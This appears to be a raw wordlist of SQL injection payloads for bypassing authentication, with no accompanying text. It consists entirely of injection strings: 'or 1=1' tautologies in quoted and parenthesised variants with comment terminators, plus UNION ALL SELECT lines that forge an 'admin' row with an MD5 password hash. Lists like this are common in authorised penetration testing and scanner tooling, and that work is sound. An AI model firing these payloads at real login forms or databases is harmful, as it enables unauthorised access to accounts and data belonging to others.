or 1=1
or 1=1--
or 1=1#
or 1=1/*
' --
' #
#
'/*
' or '1'='1
' or '1'='1'--
' or 1=1-- -
' or '1'='1-- -
' or '1'='1'#
' or '1'='1'/*
'or 1=1 or ''='
' or 1=1
' or 1=1--
' or 1=1#
' or 1=1/*
') or ('1'='1
') or ('1'='1'--
') or ('1'='1'#
') or ('1'='1'/*
') or '1'='1
') or '1'='1'--
') or '1'='1'#
') or '1'='1'/*
' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
" --
" #
"/*
" or "1"="1
" or "1"="1"--
" or 1=1-- -
" or "1"="1-- -
" or "1"="1"#
" or "1"="1"/*
"or 1=1 or ""="
' or true-- -
" or 1=1
" or 1=1--
" or 1=1#
" or 1=1/*
") or ("1"="1
") or ("1"="1"--
") or ("1"="1"#
") or ("1"="1"/*
") or "1"="1
") or "1"="1"--
") or "1"="1"#
") or "1"="1"/*
" AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
' or 1=1# a ' || 1==1 //
